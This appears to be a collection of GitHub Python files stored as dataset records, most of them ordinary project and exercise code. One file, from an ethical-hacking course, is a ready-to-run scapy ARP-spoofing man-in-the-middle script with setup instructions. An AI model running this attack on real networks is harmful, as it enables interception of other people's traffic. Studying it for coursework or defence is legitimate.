input_joins = [(name, 'arg{}'.format(arg_no + 1))\n for arg_no, name in enumerate(undef_args)]\n\n wf.connect([\n (infosource, select_files, [(field, field) for field in undef_args]),\n (select_files, joinpath, input_joins),\n (joinpath, datasink, [(\"out\", \"container\")]),\n ],\n )\n\n return wf\n","repo_name":"Neurita/pypes","sub_path":"neuro_pypes/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":6163,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"35"} +{"seq_id":"34954057167","text":"\"\"\"PyJDWP Constants.\"\"\"\n\ncmd_map = {\n \"VM::Version\": (1, 1),\n \"VM::ClassesBySignature\": (1, 2),\n \"VM::AllClasses\": (1, 3),\n \"VM::AllThreads\": (1, 4),\n \"VM::TopLevelThreadGroups\": (1, 5),\n \"VM::Dispose\": (1, 6),\n \"VM::IDSizes\": (1, 7),\n \"VM::Suspend\": (1, 8),\n \"VM::Resume\": (1, 9),\n \"VM::Exit\": (1, 10),\n \"VM::CreateString\": (1, 11),\n \"VM::Capabilities\": (1, 12),\n \"VM::ClassPaths\": (1, 13),\n \"VM::DisposeObjects\": (1, 14),\n \"VM::HoldEvents\": (1, 15),\n \"VM::ReleaseEvents\": (1, 16),\n \"VM::CapabilitiesNew\": (1, 17),\n \"VM::RedefineClasses\": (1, 18),\n \"VM::SetDefaultStratum\": (1, 19),\n \"VM::AllClassesWithGeneric\": (1, 20),\n \"VM::InstanceCounts\": (1, 21),\n \"EventRequest::Set\": (15, 1),\n \"Event::Composite\": (64, 100),\n}\n\njni_types = (\"[\", \"L\", \"Z\", \"B\", \"C\", \"S\", \"I\", \"J\", \"F\", \"D\")\n\n# Errors Constants\nNONE = 0\nINVALID_THREAD = 10\nINVALID_THREAD_GROUP = 11\nINVALID_PRIORITY = 12\nTHREAD_NOT_SUSPENDED = 13\nTHREAD_SUSPENDED = 14\nTHREAD_NOT_ALIVE = 15\nINVALID_OBJECT = 20\nINVALID_CLASS = 21\nCLASS_NOT_PREPARED = 22\nINVALID_METHODID = 23\nINVALID_LOCATION = 24\nINVALID_FIELDID = 25\nINVALID_FRAMEID = 30\nNO_MORE_FRAMES = 31\nOPAQUE_FRAME = 32\nNOT_CURRENT_FRAME = 33\nTYPE_MISMATCH = 34\nINVALID_SLOT = 35\nDUPLICATE = 40\nNOT_FOUND = 41\nINVALID_MONITOR = 50\nNOT_MONITOR_OWNER = 51\nINTERRUPT = 52\nINVALID_CLASS_FORMAT = 60\nCIRCULAR_CLASS_DEFINITION = 61\nFAILS_VERIFICATION = 62\nADD_METHOD_NOT_IMPLEMENTED = 63\nSCHEMA_CHANGE_NOT_IMPLEMENTED = 64\nINVALID_TYPESTATE = 65\nHIERARCHY_CHANGE_NOT_IMPLEMENTED = 66\nDELETE_METHOD_NOT_IMPLEMENTED = 67\nUNSUPPORTED_VERSION = 68\nNAMES_DONT_MATCH = 69\nCLASS_MODIFIERS_CHANGE_NOT_IMPLEMENTED = 70\nMETHOD_MODIFIERS_CHANGE_NOT_IMPLEMENTED = 71\nNOT_IMPLEMENTED = 99\nNULL_POINTER = 100\nABSENT_INFORMATION = 101\nINVALID_EVENT_TYPE = 102\nILLEGAL_ARGUMENT = 103\nOUT_OF_MEMORY = 110\nACCESS_DENIED = 111\nVM_DEAD = 112\nINTERNAL = 113\nUNATTACHED_THREAD = 115\nINVALID_TAG = 500\nALREADY_INVOKING = 502\nINVALID_INDEX = 503\nINVALID_LENGTH = 504\nINVALID_STRING = 506\nINVALID_CLASS_LOADER = 507\nINVALID_ARRAY = 508\nTRANSPORT_LOAD = 509\nTRANSPORT_INIT = 510\nNATIVE_METHOD = 511\nINVALID_COUNT = 512\n\nerror_messages = {\n 0: \"No error has occurred.\",\n 10: \"Passed thread is null, is not a valid thread or has exited.\",\n 11: \"Thread group invalid.\",\n 12: \"Invalid priority.\",\n 13: \"If the specified thread has not been suspended by an event.\",\n 14: \"Thread already suspended.\",\n 15: \"Thread has not been started or is now dead.\",\n 20: \"If this reference type has been unloaded and garbage collected.\",\n 21: \"Invalid class.\",\n 22: \"Class has been loaded but not yet prepared.\",\n 23: \"Invalid method.\",\n 24: \"Invalid location.\",\n 25: \"Invalid field.\",\n 30: \"Invalid jframeID.\",\n 31: \"There are no more Java or JNI frames on the call stack.\",\n 32: \"Information about the frame is not available.\",\n 33: \"Operation can only be performed on current frame.\",\n 34: \"The variable is not an appropriate type for the function used.\",\n 35: \"Invalid slot.\",\n 40: \"Item already set.\",\n 41: \"Desired element not found.\",\n 50: \"Invalid monitor.\",\n 51: \"This thread doesn't own the monitor.\",\n 52: \"The call has been interrupted before completion.\",\n 60: \"The virtual machine attempted to read a class file and determined that the file is malformed or otherwise cannot be interpreted as a class file.\",\n 61: \"A circularity has been detected while initializing a class.\",\n 62: \"The verifier detected that a class file, though well formed, contained some sort of internal inconsistency or security problem.\",\n 63: \"Adding methods has not been implemented.\",\n 64: \"Schema change has not been implemented.\",\n 65: \"The state of the thread has been modified, and is now inconsistent.\",\n 66: \"A direct superclass is different for the new class version, or the set of directly implemented interfaces is different and canUnrestrictedlyRedefineClasses is false.\",\n 67: \"The new class version does not declare a method declared in the old class version and canUnrestrictedlyRedefineClasses is false.\",\n 68: \"A class file has a version number not supported by this VM.\",\n 69: \"The class name defined in the new class file is different from the name in the old class object.\",\n 70: \"The new class version has different modifiers and and canUnrestrictedlyRedefineClasses is false.\",\n 71: \"A method in the new class version has different modifiers than its counterpart in the old class version and and canUnrestrictedlyRedefineClasses is false.\",\n 99: \"The functionality is not implemented in this virtual machine.\",\n 100: \"Invalid pointer.\",\n 101: \"Desired information is not available.\",\n 102: \"The specified event type id is not recognized.\",\n 103: \"Illegal argument.\",\n 110: \"The function needed to allocate memory and no more memory was available for allocation.\",\n 111: \"Debugging has not been enabled in this virtual machine. JVMTI cannot be used.\",\n 112: \"The virtual machine is not running.\",\n 113: \"An unexpected internal error has occurred.\",\n 115: \"The thread being used to call this function is not attached to the virtual machine. Calls must be made from attached threads.\",\n 500: \"object type id or class tag.\",\n 502: \"Previous invoke not complete.\",\n 503: \"Index is invalid.\",\n 504: \"The length is invalid.\",\n 506: \"The string is invalid.\",\n 507: \"The class loader is invalid.\",\n 508: \"The array is invalid.\",\n 509: \"Unable to load the transport.\",\n 510: \"Unable to initialize the transport.\",\n 512: \"The count is invalid.\",\n}\n","repo_name":"tamentis/pyjdwp","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"11947119284","text":"ALL = set(\"GIN, WHISKEY, RUM, TEQUILA, BOURBON, BRANDY, ABSINTHE, TRIPLESEC, LIQUER, VODKA, BARLEY, RYE, SAKE, COGNAC, MEZCAL\".split(\", \"))\n\nn = int(input())\n\nleft = set(ALL)\ncan = [set() for _ in range(n)]\n\nfor i in range(n):\n like = input().split(\", \")\n dislike = input().split(\", \")\n\n for drink in dislike:\n if drink in left:\n left.remove(drink)\n\n for drink in like:\n can[i].add(drink)\n\nresult = True\n\nfor i in range(n):\n found = False\n\n for drink in can[i]:\n if drink in left:\n found = True\n\n result = result and found\n\nif result:\n print(\"its lit\")\nelse:\n print(\"not lit\")\n","repo_name":"bradyz/sandbox","sub_path":"challenges/ut_acm_4_7_17/drink.py","file_name":"drink.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"35929047639","text":"N, L = map(int, input().split())\ndiff = 10**100\nans = None\n\numami_all = N*L + N*(N+1)//2 - N\nfor i in range(1, N+1):\n umami_part = umami_all - (L + i - 1)\n d = abs(umami_all - umami_part)\n if d < diff:\n diff = d\n ans = umami_part\n\nprint(ans)\n","repo_name":"wonda-tea-coffee/competitive_programming.py","sub_path":"atcoder/abc131_b.py","file_name":"abc131_b.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23545234515","text":"\"\"\"\nindi game engine\ncharacter with shadow\n\n\"\"\"\nimport igeCore as core\nfrom igeCore import devtool\nfrom igeCore.apputil import graphicsHelper\nimport igeVmath as vmath\nimport os.path\nfrom char import Character\nfrom cam import TargetCamera\nfrom controller import Controller\n\ndevtool.convertAssets('.','.', core.TARGET_PLATFORM_MOBILE)\ncore.window(True, 480, 640)\n\ncore.shaderGenerator().globalShadowBias = 0.001\n\n#core.autoSaveShader('shaders')\n\n#The character shadow is specified to be set at the time of conversion by figure.conf.\n#See Sapphiart/figure.conf\nchar = Character()\n\ncam = TargetCamera()\ncontroller = Controller()\n\n\nground = graphicsHelper.createSprite(20.0,20.0,texture ='images/Dirt-2290', normal=(0,1,0))\n#add shadow shader \nfor i in range(ground.numMaterials):\n shaderGen = ground.getShaderGenerator(i)\n shaderGen.setShadow(False,True,True)\n ground.setShaderGenerator(i, shaderGen)\n\n#create shadow buffer\nshadowBuffer = core.texture('Shadow', 1024,1024, format=core.GL_RED, depth=True, float=True)\n\n\nefig = graphicsHelper.createSprite(100, 100,shadowBuffer)\nefig.position = vmath.vec3(-100, 200, 0)\n\n# what you want to draw should be registered in showcase\nshowcase2D = core.showcase('2dcase')\nshowcase3D = core.showcase(\"3dcase\")\n\nshowcase3D.add(ground)\nshowcase3D.add(char.figure)\n\nshowcase2D.add(efig)\nshowcase2D.add(controller.frame)\nshowcase2D.add(controller.button)\n\nshowcase3D.addShadowBuffer(shadowBuffer)\n\n#set shadow environment\nenv = core.environment()\nenv.setDirectionalLampDirection(0, (5,5,5))\nenv.shadowColor = (0.0, 0.0, 0.0)\nenv.shadowDensity = 0.7\nenv.shadowWideness = 12.0\nenv.ambientColor = (0.2,0.2,0.2)\n\nshowcase3D.add(env)\n\n\ncam2D = core.camera('2dcam')\ncam2D.orthographicProjection = True\ncam2D.position = (0, 0, 100)\n\nloop = True\nwhile loop:\n core.update()\n dv = 0.0\n moveVector = vmath.vec3(0.0, 0.0, 0.0)\n\n touch = core.singleTouch()\n if touch is not None:\n moveVector = vmath.vec3(touch['cur_x'] - touch['org_x'], 0, -(touch['cur_y'] - touch['org_y']))\n d = vmath.length(moveVector)\n\n viewMat = cam.getWalkThroughMatrix()\n moveVector = vmath.vec3(viewMat * moveVector)\n char.step(moveVector)\n cam.step(char.figure)\n controller.step()\n\n cam.camera.shoot(showcase3D, shadowBuffer, renderPass=core.PASS_SHADOW)\n cam.camera.shoot(showcase3D)\n cam2D.shoot(showcase2D, clearColor=False)\n\n core.swap()\n","repo_name":"indigames/pyxieTutorials","sub_path":"shadow02/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"13969151940","text":"\"\"\"Controller functions and routes for authorization CRUD.\"\"\"\n\nfrom fastapi import APIRouter, Header, Response, status\nfrom pydantic import BaseModel\nfrom models.Token import Token\nfrom models.Account import Account\n\nrouter = APIRouter()\n\n\nclass UpdateAuthorizationRequestBody(BaseModel):\n \"\"\"Request body model.\"\"\"\n authorization: dict\n app_id: str\n email: str\n\n\n@router.get('/authorizations', tags=['Authorization'])\ndef get_accounts_with_authorization(response: Response,\n app_id: str,\n db_filter: str,\n value: str,\n authorization: str = Header(default=None)):\n \"\"\"Gets all accounts with specified authorizations.\n\n It may be necessary to query all accounts with a certain\n authorization. This endpoint can query accounts and return that\n list of accounts.\n \"\"\"\n\n # Get read permissions of the requesting account.\n requesting_account = Token.decode_token(authorization.split(' ')[1])\n requesting_account = Account.find_by_email(requesting_account['email'])\n read_permissions: dict = requesting_account.authorizations.get(\n app_id, {}).get('_read', {})\n\n # If requesting user has permission, return accounts data.\n if read_permissions.get(\n '_superuser', False) is True or read_permissions.get(\n db_filter, False) is True:\n accounts = Account.find_by_authorization(app_id, db_filter, value)\n else:\n response.status_code = status.HTTP_400_BAD_REQUEST\n return {\n 'error': \"\"\"This account is not authorized to write to this user's authorization(s).\"\"\"\n }\n\n return {\n 'accounts': accounts\n }\n\n\n@router.put('/update-authorization', tags=['Authorization'])\ndef update_authorization(response: Response,\n body: UpdateAuthorizationRequestBody,\n authorization: str = Header(default=None)):\n \"\"\"Updates the authorization for a user for a given app.\n\n Apps can store data under each account regarding authorization.\n Apps can pass a dictionary to this endpoint which will be stored in\n the user's account. If no record exists for the app ID, a new\n record will be created. If a record already exists, it will be\n replaced with the new data.\n \"\"\"\n\n # Get write permissions of the requesting account.\n requesting_account = Token.decode_token(authorization.split(' ')[1])\n requesting_account = Account.find_by_email(requesting_account['email'])\n write_permissions: dict = requesting_account.authorizations.get(\n body.app_id, {}).get('_write', {})\n\n account = Account.find_by_email(body.email)\n\n # Ensure this user has permission to update this authorization.\n can_write_permissions: bool = write_permissions.get('_superuser', False)\n if not can_write_permissions:\n existing_authorization_keys = list(\n account.authorizations.get(body.app_id, {}).keys())\n future_authorization_keys = list(body.authorization.keys())\n authorization_key_change_delta = list(\n set(existing_authorization_keys).difference(\n set(future_authorization_keys)))\n changing_keys = future_authorization_keys + authorization_key_change_delta\n\n has_individual_permissions = True\n for key in changing_keys:\n if not write_permissions.get(key, False):\n has_individual_permissions = False\n break\n can_write_permissions = has_individual_permissions\n\n # If requesting user has permission, write new permissions to the database.\n if can_write_permissions:\n account.update_authorization(body.app_id, body.authorization)\n account.update()\n else:\n response.status_code = status.HTTP_400_BAD_REQUEST\n return {\n 'error': \"\"\"This account is not authorized to write to this user's authorization(s).\"\"\"\n }\n\n return {\n 'authorizations': account.authorizations\n }\n\n\n@router.delete('/delete-authorization', tags=['Authorization'])\ndef remove_authorization(response: Response,\n app_id: str,\n email: str,\n authorization: str = Header(default=None)):\n \"\"\"Removes a record of authorization from a user's account.\n\n Takes a value for app_id, then removes the entire record of\n authorization for that app in the user's account.\n \"\"\"\n\n # Get write permissions of the requesting account.\n requesting_account = Token.decode_token(authorization.split(' ')[1])\n requesting_account = Account.find_by_email(requesting_account['email'])\n write_permissions: dict = requesting_account.authorizations.get(\n app_id, {}).get('_write', {})\n\n # If requesting user has permission,\n # delete app permission(s) from the database.\n if write_permissions.get('_superuser', False) is True:\n account = Account.find_by_email(email)\n else:\n response.status_code = status.HTTP_400_BAD_REQUEST\n return {\n 'error': \"\"\"This account is not authorized to delete this user's authorization(s).\"\"\"\n }\n\n try:\n account.remove_authorization(app_id)\n\n except RuntimeError as _:\n response.status_code = status.HTTP_400_BAD_REQUEST\n return {\n 'authorizations': account.authorizations,\n 'message': 'This authorization already does not exsit.'\n }\n\n account.update()\n\n return {\n 'authorizations': account.authorizations\n }\n","repo_name":"mboeren/auth-service","sub_path":"controllers/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":5733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"42807859059","text":"from django.urls import path\n\nfrom .views import BlogCreate, BlogDetail, BlogCategoryCreate, BlogCategoryDetail, TagCreate, TagDetail\n\n#Blog url pattern\nurlpatterns = [\n path('', BlogCreate.as_view(), name=\"blogs\"),\n path('/', BlogDetail.as_view(), name=\"blog\"),\n path('tags', TagCreate.as_view(), name=\"tags\"),\n path('tags/', TagDetail.as_view(), name=\"tag\"),\n path('categories', BlogCategoryCreate.as_view(), name=\"categories\"),\n path('categories/', BlogCategoryDetail.as_view(), name=\"category\")\n]\n","repo_name":"AhmetKadayfc/fylo-backend","sub_path":"src/modules/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"34752882709","text":"# O(ws + nm.8^s) time | O(ws + nm) space where s is the length of the largest word\ndef boggleBoard(board, words):\n trie = Trie()\n for word in words:\n trie.addWord(word)\n visited = [[False for i in row] for row in board]\n finalWords = {}\n for i in range(len(board)):\n for j in range(len(board[0])):\n explore(i, j, board, trie, visited, finalWords)\n\n return list(finalWords.keys())\n\n\ndef explore(i, j, board, trie, visited, finalWord):\n if visited[i][j]:\n return\n char = board[i][j]\n if char not in trie:\n return\n visited[i][j] = True\n trieNode = trie[char]\n if \"*\" in trieNode:\n finalWord[trieNode[\"*\"]] = True\n list_of_neighbors = getNeighbors(i, j, board)\n for neighbor in list_of_neighbors:\n explore(neighbor[0], neighbor[1], board, trieNode, visited, finalWord)\n visited[i][j] = False\n\n\ndef getNeighbors(i, j, board):\n neighbors = []\n possibleDirections = [\n (-1, 0),\n (-1, 1),\n (0, 1),\n (1, 1),\n (1, 0),\n (1, -1),\n (0, -1),\n (-1, -1),\n ]\n for direction in possibleDirections:\n di, dj = direction\n newI, newJ = i + di, j + dj\n if 0 <= newI < len(board) and 0 <= newJ < len(board[0]):\n neighbors.append([newI, newJ])\n return neighbors\n\n\nclass Trie:\n def __init__(self):\n self.root = {}\n self.endSymbol = \"*\"\n\n def addWord(self, word):\n current = self.root\n for char in word:\n if char not in current:\n current[char] = {}\n current = current[char]\n current[self.endSymbol] = word\n","repo_name":"rimijoker/Coding-Interview-Practice","sub_path":"Algoexpert/Hard/Boggle Board.py","file_name":"Boggle Board.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"2161041862","text":"import cloud_detection_new as cloud_detection\nfrom matplotlib import pyplot as plt\nimport views\nfrom skimage import exposure\n\nnir = cloud_detection.get_nir()[0:600,2000:2600]\nred = cloud_detection.get_red()[0:600,2000:2600]\ngreen = cloud_detection.get_green()[0:600,2000:2600]\nblue = cloud_detection.get_blue()[0:600,2000:2600] # or use coastal\ncoastal = cloud_detection.get_coastal()[0:600,2000:2600]\nmarine_shadow_index = (green-blue)/(green+blue)\n\nimg = views.create_composite(red, green, blue)\nimg_rescale = exposure.rescale_intensity(img, in_range=(0, 90))\n\nplt.rcParams['savefig.facecolor'] = \"0.8\"\nvmin, vmax=0.0,0.1\ndef example_plot(ax, data, fontsize=12):\n ax.imshow(data, vmin=vmin, vmax=vmax)\n ax.locator_params(nbins=3)\n ax.set_xlabel('x-label', fontsize=fontsize)\n ax.set_ylabel('y-label', fontsize=fontsize)\n ax.set_title('Title', fontsize=fontsize)\n\nplt.close('all')\nfig = plt.figure\n\n\nax1=plt.subplot(243)\nax2=plt.subplot(244)\nax3=plt.subplot(247)\nax4=plt.subplot(248)\nax5=plt.subplot(121)\n\na_coastal = coastal[500:600, 500:600]\na_blue = blue[500:600, 500:600]\na_green = green[500:600, 500:600]\na_red = red[500:600, 500:600]\na_nir = nir[500:600, 500:600]\na_img = img[500:600, 500:600]\nspec1 = [a_coastal[60, 60], a_blue[60, 60], a_green[60, 60], a_red[60, 60], a_nir[60, 60]]\n\nb_coastal = coastal[200:300, 100:200]\nb_blue = blue[200:300, 100:200]\nb_green = green[200:300, 100:200]\nb_red = red[200:300, 100:200]\nb_nir = nir[200:300, 100:200]\nb_img = img[200:300, 100:200]\n\nexample_plot(ax1, coastal)\nexample_plot(ax2, blue)\nexample_plot(ax3, green)\nexample_plot(ax4, red)\nax5.imshow(img)\n\n# plt.tight_layout()\nplt.close('all')\nspec = [b_coastal[60, 60], b_blue[60, 60], b_green[60, 60], b_red[60, 60], b_nir[60, 60]]\nplt.plot(spec, 'k*-')\nplt.plot(spec1, 'k.-')\n\nplt.close('all')\ncbg = (coastal+blue+green)/3\n\nplt.imshow(cbg/red)","repo_name":"nicholaschris/landsatpy","sub_path":"stuff.py","file_name":"stuff.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41210219641","text":"def main():\n while True:\n try:\n needs, costs, total = input1()\n output1(needs, costs, total)\n except Exception as err:\n print(err)\n\n answer = input('Would you like to run this program again? Enter Y or N: ')\n while answer.upper() != 'Y' and answer.upper() != 'N':\n answer = input('Please enter Y or N: ')\n if answer.upper() == 'N':\n print(f'\\nThank for using the program')\n break\n\n\ndef input1():\n needs = ['Rent', 'Food', 'Transport', 'Other']\n costs = []\n total = 0\n print('Welcome to the personal budget program!')\n for items in range(len(needs)):\n print(f'How much did you spend on {needs[items]}?')\n cost = input('\\tEnter a positive whole number: ')\n while cost == '0' or cost.isnumeric() is False:\n cost = input('Use a whole number greater than 0: ')\n costs.append(cost)\n cost = int(cost)\n total += cost\n\n return needs, costs, total\n\ndef output1(needs, costs, total):\n print('Here\\'s your overall budget:')\n for items in range(len(needs)):\n print('{:15}'.format(needs[items]), end='')\n print()\n for items in range(len(costs)):\n print('${:<14}'.format(costs[items]), end='')\n print()\n print(f'You\\'re total monthly budget is ${total:.2f}')\n\nmain()","repo_name":"mn4774jm/PycharmProjects","sub_path":"Pycharm_files/final_practice/midterm1.py","file_name":"midterm1.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2941023411","text":"#Welcome to our functioning MITM Script. \r\n#Please read the comments and change the targetIP, spoofIP, sourceMAC, destinationMac, and gatewayIP to match your two VM's\r\n#After that please save and run in command prompt with \"Sudo Python3 'File Destination'\"\r\n#CTRL + C Stops the MITM Attack\r\n\r\n\r\nimport scapy.all as scapy\r\nimport time\r\nimport argparse\r\nimport sys\r\n\r\n#Keep quotations around all the inputs\r\n\r\n#IPv4 Address of Windows Machine\r\ntargetIP = \"192.168.83.130\" \r\n\r\n#Default Gateway of Windows Machine\r\nspoofIP = \"192.168.83.2\" \r\n\r\n#ether of Kali eth0\r\nsourceMAC = \"00:0c:29:c4:64:ac\" \r\n\r\n#Physical Address of Windows Machine\r\ndestinationMac = \"00:0C:29:17:90:6B\" \r\n\r\n#Same as Spoof ID (Default Gateway of Windows Machine)\r\ngatewayIP = \"192.168.83.2\" \r\n\r\n\r\n\r\n\r\ndef spoofer(targetIP, spoofIP):\r\n packet=scapy.ARP(op=2,pdst=targetIP,hwdst=destinationMac,psrc=spoofIP)\r\n scapy.send(packet, verbose=False)\r\n\r\ndef restore(destinationIP, sourceIP):\r\n packet = scapy.ARP(op=2,pdst=destinationIP,hwdst=destinationMac,psrc=sourceIP,hwsrc=sourceMAC)\r\n scapy.send(packet, count=4,verbose=False)\r\n\r\n\r\npackets = 0\r\ntry:\r\n while True:\r\n spoofer(targetIP,gatewayIP)\r\n spoofer(gatewayIP,targetIP)\r\n print(\"\\r[+] Sent packets \"+ str(packets)),\r\n sys.stdout.flush()\r\n packets +=2\r\n time.sleep(2)\r\nexcept KeyboardInterrupt:\r\n print(\"\\nInterrupted Spoofing. Returning to normal state..\")\r\n restore(targetIP,gatewayIP)\r\n restore(gatewayIP,targetIP)","repo_name":"DanielWMaciejewski/Ethical_Hacking_Final","sub_path":"MITMScript.py","file_name":"MITMScript.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8299570658","text":"'''\r\n4. Write a Python program to create a list by concatenating a given list which range goes from 1\r\nto n.\r\nSample list : ['p', 'q']\r\nn =5\r\nSample Output : ['p1', 'q1', 'p2', 'q2', 'p3', 'q3', 'p4', 'q4', 'p5', 'q5']\r\n'''\r\n\r\nnum = int(input(\"Enter No. of items in the list: \"))\r\nli_st = []\r\nfor each in range(num):\r\n items = input(\"Enter item: \")\r\n li_st.append(items)\r\nnew_list = []\r\nx = int(input(\"Enter a number: \"))\r\nfor each in range(1, x+1):\r\n for new in li_st:\r\n new_list.append(new + str(each))\r\nprint(f\"New list: {new_list}\")\r\n","repo_name":"Rajin69930/Power-Workshop","sub_path":"Jan 19/Assignment/List/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72470306340","text":"import sys\nfrom calories.models import CalorieIntake\nfrom django.db.models import Avg\nfrom pomodoros.models import Pomodoro\nfrom steps.models import Steps\nfrom water_intake.models import WaterIntake\n\n\ndef get_quick_stats(author):\n \"\"\" Return quick stats of a user. \"\"\"\n avg_calories = CalorieIntake.objects.all().filter(author=author).aggregate(Avg('calories'))['calories__avg']\n avg_pomodoros = Pomodoro.objects.all().filter(author=author).aggregate(Avg('pomodoro'))['pomodoro__avg']\n avg_steps = Steps.objects.all().filter(author=author).aggregate(Avg('step_count'))['step_count__avg']\n avg_water_intake = WaterIntake.objects.all().filter(author=author).aggregate(Avg('drink_progress'))[\n 'drink_progress__avg']\n\n avg = [\n {\n 'icon': 'calories.png',\n 'average': round(avg_calories, 2) if avg_calories is not None else '0',\n 'description': 'Avg. calories taken.',\n 'unit': 'kcal'\n },\n {\n 'icon': 'stopwatch.png',\n 'average': round(avg_pomodoros, 2) if avg_pomodoros is not None else '0',\n 'description': 'Avg. pomodoro taken.',\n 'unit': 'pomodoro'\n },\n {\n 'icon': 'steps.png',\n 'average': round(avg_steps, 2) if avg_steps is not None else '0',\n 'description': 'Avg. steps taken.',\n 'unit': 'steps'\n },\n {\n 'icon': 'water.png',\n 'average': round(avg_water_intake, 2) if avg_water_intake is not None else '0',\n 'description': 'Avg. drink progress.',\n 'unit': 'L'\n }\n ]\n return avg\n\n\nif __name__ == '__main__':\n get_quick_stats(sys.argv)\n","repo_name":"asis2016/gesund","sub_path":"gesund/dashboard/views/quick_stats.py","file_name":"quick_stats.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39590551926","text":"Import(\"env\")\nimport os\nimport shutil\n\ndef post_program_action(source, target, env):\n\n targetfile = os.path.abspath(target[0].get_abspath())\n filename = os.path.basename(targetfile)\n startpath = os.path.dirname(targetfile)\n destpath = os.path.normpath(os.path.join(startpath, '../../../.firmware'))\n \n # if it should be placed in a subfolder of the environment (e.g. 'd1_mini'), comment out the line above and uncomment the two below\n #basedir = os.path.basename(startpath)\n #destpath = os.path.normpath(os.path.join(startpath, '../../../.firmware', basedir))\n\n print(\"\\nCopying \" + filename + \" file to the build directory...\\n\")\n print(\"Target file: \" + targetfile)\n print(\"Destination directory: \" + destpath)\n\n # create directories if they don't exist\n if not os.path.exists(destpath):\n os.makedirs(destpath)\n\n # copy the target file to the destination, if it exist\n if os.path.exists(targetfile):\n shutil.copy(targetfile, destpath)\n\nenv.AddPostAction(\"$BUILD_DIR/${PROGNAME}.bin\", post_program_action)\n","repo_name":"softwarecrash/Daly2MQTT","sub_path":"tools/post_compile.py","file_name":"post_compile.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"35"} +{"seq_id":"24387847337","text":"import numpy as np\n\n\nclass CategoryToNumeric(object):\n \"\"\"\n Transform class that replaces a categorical value with a representative target value\n for instances that belong to that category. This technique is useful as a method to\n turn categorical features into numeric values for use in an estimator, and can be\n viewed as an alternative approach to one-hot encoding. Only suitable for regression\n tasks.\n\n Parameters\n ----------\n categorical_features : list\n A list of integers representing the column indices to apply the transform to.\n\n metric : {'mean', 'median', 'std'}, optional, default 'mean'\n The method used to calculate the replacement value for a category.\n\n Attributes\n ----------\n feature_map_ : dict\n Mapping of categorical to target values.\n \"\"\"\n def __init__(self, categorical_features, metric='mean'):\n self.categorical_features = categorical_features\n self.metric = metric\n self.feature_map_ = {}\n\n def fit(self, X, y):\n \"\"\"\n Fit the transform using X as the training data and y as the label.\n\n Parameters\n ----------\n X : array-like\n Training input samples.\n\n y : array-like\n Target values.\n \"\"\"\n for i in self.categorical_features:\n self.feature_map_[i] = {}\n distinct = list(np.unique(X[:, i]))\n for j in distinct:\n if self.metric == 'mean':\n self.feature_map_[i][j] = y[X[:, i] == j].mean()\n elif self.metric == 'median':\n self.feature_map_[i][j] = y[X[:, i] == j].median()\n elif self.metric == 'std':\n self.feature_map_[i][j] = y[X[:, i] == j].std()\n else:\n raise Exception('Metric not recognized.')\n\n def transform(self, X):\n \"\"\"\n Apply the transform to the data.\n\n Parameters\n ----------\n X : array-like\n Training input samples.\n \"\"\"\n X_trans = np.copy(X)\n for i in self.categorical_features:\n distinct = list(np.unique(X_trans[:, i]))\n for j in distinct:\n X_trans[X_trans[:, i] == j, i] = self.feature_map_[i][j]\n\n return X_trans\n\n def fit_transform(self, X, y):\n \"\"\"\n Wrapper method that calls fit and transform sequentially.\n\n Parameters\n ----------\n X : array-like\n Training input samples.\n\n y : array-like\n Target values.\n \"\"\"\n self.fit(X, y)\n return self.transform(X)\n","repo_name":"jdwittenauer/ionyx","sub_path":"ionyx/contrib/category_to_numeric.py","file_name":"category_to_numeric.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"29197494799","text":"import test as t\n\n# Creamos a las personas que estarán en el hospital\npersona1 = t.Persona('111A', 'Alejandra', 'Sánchez')\ndoctor1 = t.Doctor('pediatra', persona1.dni, persona1.nombre, persona1.apellido, en_servicio=False)\ndoctor2 = t.Doctor('familia', '222A', 'Irene', 'Sanz', en_servicio=False)\n# print(doctor1)\n# print(doctor2)\nenfermero1 = t.Enfermero('maxilofacial', '333A', 'Carlos', 'Pérez', False)\nenfermero2 = t.Enfermero('urgencias', '444A', 'Álvaro', 'Gómez', False)\n# print(enfermero1)\n# print(enfermero2)\npaciente1 = t.Paciente('555A', 'Paco', 'Saura', ['falta olfato', 'dolor cabeza'])\npaciente2 = t.Paciente('666A', 'Marta', 'San Miguel', ['dolor de tobillo', 'inflamación en la zona'])\npaciente3 = t.Paciente('777A', 'Lucía', 'Del Romero', ['fiebre', 